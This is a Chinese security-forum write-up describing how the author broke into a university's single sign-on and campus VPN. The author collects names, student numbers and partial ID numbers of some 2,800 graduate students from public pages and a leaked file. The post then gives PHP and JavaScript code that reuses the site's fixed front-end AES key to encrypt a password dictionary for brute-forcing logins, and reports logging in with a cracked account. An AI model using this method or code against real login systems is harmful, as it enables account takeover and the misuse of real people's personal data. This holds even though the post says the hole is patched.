安全矩阵

 找回密码
 立即注册
搜索
查看: 3086|回复: 0

漏洞挖掘 | 登录某大学VPN系统

[复制链接]

991

主题

1063

帖子

4315

积分

论坛元老

Rank: 8Rank: 8

积分
4315
发表于 2021-3-6 09:01:03 | 显示全部楼层 |阅读模式
原文链接:漏洞挖掘 | 登录某大学VPN系统

现在的大学日常都是sso统一身份认证,难搞哦

  • 寻找废弃站点,作为突破口
  • 信息搜集啊,信息搜集
信息搜集

加上了他们大学类似表白墙之类的小姐姐的QQ
一通乱翻好多学号+姓名,不再一一列出了
得到一个名字:赵天宇!霸气!就你了!

打开以看,各种信息免费赠送

共33页,一千二百多个身份证后四位
知道这是个研究生,进入研究生院
一通乱翻

找到这么个文件,下载下来后
2800多条研究生信息(后来一查,基本是全部的了)


登陆系统

通过信息搜集知道,sso需要学号和身份证后六位登录
通过刚才获取到的信息
我们已经知道了最起码1200条学号、姓名和身份证号后四位
他们学校基本都是展示页面,其他的都需要内网访问,但是还存在一个智慧校园

这里不存在验证码,可以爆破,但是对密码做了aes加密

不难看出加密在前端,直接定位关键js文件
可以看出加密的key都是固定得

偷个懒,把js下载下来
写程php代码,将生成的密码字典加密
encry_js.php

  1. <html>
  2.     <head>
  3.         <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
  4.         <script type="text/javascript" src="js/security.js"></script>
  5.         <script type="text/javascript" src="js/login.js"></script>
  6.         <script type="text/javascript">
  7.             function file(pass){
  8.                 var pass = pass;
  9.                 var pwd = checkPassLogin(pass);
  10.                 // // document.write("<span>"+ pwd +"</span>");
  11.                 var xhr = null;
  12.                 if(window.XMLHttpRequest){
  13.                     xhr = new XMLHttpRequest();
  14.                 }else{
  15.                     xhr = new ActiveXObject("Microsoft.XMLHTTP");
  16.                 }

  17.                 //准备发送
  18.                 xhr.open("post","http://127.0.0.1:92/js/encry.php",true);//这里的发送方式取决于后台,true待变异步发送
  19.                 xhr.setRequestHeader("Content-type", "application/x-www-form-urlencoded;charset=UTF-8");// 向请求添加 HTTP 头,POST如果有数据一定加加!!!!
  20.                 var value = "value="+pwd + "&pass=" + pass;//定义发送内容
  21.                 // console.log(value)
  22.                 xhr.send(value);
  23.                 xhr.onreadystatechange=function(){
  24.                     if (xhr.readyState == 4 && xhr.status == 200){//说明请求完成/响应200,说明请求成功
  25.                         var request = xhr.responseText;//获取响应的内容
  26.                         // console.log(request);
  27.                         // if (request == "ok"){
  28.                         //     document.write("<span>"+ pwd +"</span>");
  29.                         // }else{
  30.                         // }
  31.                         // document.write("<span>"+ request +"</span>\n");
  32.                     }
  33.                 }
  34.             }
  35.         </script>
  36.     </head>
  37.     <body>
  38.     <?php
  39.         $file = fopen(".\\1134.txt", "r");
  40.         //输出文本中所有的行,直到文件结束为止。
  41.         while(! feof($file))
  42.         {
  43.             $password= trim(fgets($file));
  44.             echo "<script>file('".$password."')</script>";
  45.         }
  46.         fclose($file);
  47.     ?>
  48.     </body>
  49. <html>
复制代码

encry.php
  1. <?php
  2. $value = $_POST['value'];
  3. // $pass = $_POST['pass'];
  4. // if($value == "2867a2bb26a41ddde23ad4747693123d20feae03a18c1ffd68be6105e0ec594eca82cc3160d46189335704c0389ee928669d89520ccc36d59ed408ad603d10a59f10e7c7afa8eb877d821e1521dc5f1152bf149cb407476a775fcbb057dc98d7312402a06b313341441d1d2c883e77d1a254d119c98aa7830a171df02ad4e37f"){
  5. // file_put_contents("1.txt", $pass, FILE_APPEND);
  6. // }
  7. $value = $value."\n";
  8. file_put_contents("test-1134.txt", $value, FILE_APPEND);

  9. ?>
复制代码

最后在爆破的时候,第三章账号成功得到了账号/密码

上面注释就是密码的字符串,但是绕我修改密码才能进入,苟的很

点击修改密码又不让访问,还能不能更苟

直接下载他们的vpn软件
使用刚才的账号密码,成功登录

校内资源任意访问

end
该漏洞已经修补完毕,大家学习下姿势即可




















回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2024-11-28 19:40 , Processed in 0.015241 second(s), 18 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表